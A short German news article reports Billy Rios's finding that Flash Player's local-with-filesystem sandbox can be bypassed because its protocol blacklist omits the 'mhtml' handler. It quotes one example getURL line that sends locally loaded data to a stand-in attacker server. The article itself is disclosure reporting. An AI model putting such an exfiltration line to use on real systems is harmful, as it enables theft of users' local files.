Flash-Sandbox lässt sich aushebeln

Die als Schutzmaßnahme implementierte „Sandbox“ des Flash-Players lässt sich laut dem Sicherheitsexperten Billy Rios aushebeln. Betroffen ist seiner Meinung nach aber nur ein sehr geringer Teil der Flash-Nutzer.

Die „Local-with-Filesystem-Sandbox“ soll dafür sorgen, dass abgespielte SWF-Dateien zwar auf lokal gespeicherte Inhalte zugreifen, diese aber nicht weitersenden können. Dies wird durch das Unterbinden von HTTP- und HTTPS-Verbindungen sowie JavaScript ermöglicht.

Allerdings lässt sich diese Sperre durch den Einsatz des „getURL“-Befehls zusammen mit dem Protocol Handler „mhtml“ umgehen. Möglich ist dies durch die Art und Weise, wie Adobe den Verbindungsaufbau unterbinden will. Statt jegliche Kommunikation unmöglich zu machen, sind in einer „Blacklist“ lediglich zahlreiche Protocol Handler aufgeführt, die nicht genutzt werden können. Hier fehlt allerdings unter anderem das erwähnte „mhtml“.

Rios nennt hier als Beispiel für das Aushebeln der Sicherheit den Befehl „getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);“, mit dem zuvor geladene lokale Inhalte an die genannte Adresse weitergeleitet werden können. Bei diesem Verfahren würde die Übermittlung über das HTTP-Protokoll laufen und in den wenigsten Fällen blockiert werden. Außerdem erhalte ein Windows-7-Nutzer keinerlei Benachrichtigung über die Nutzung des Protocol Handlers.

Dass nur wenige Nutzer betroffen sind, liegt laut Rios an der Tatsache, dass diese Lücke nur genutzt werden kann, wenn die SWF-Dateien manuell auf den Rechner heruntergeladen und dann ausgeführt werden.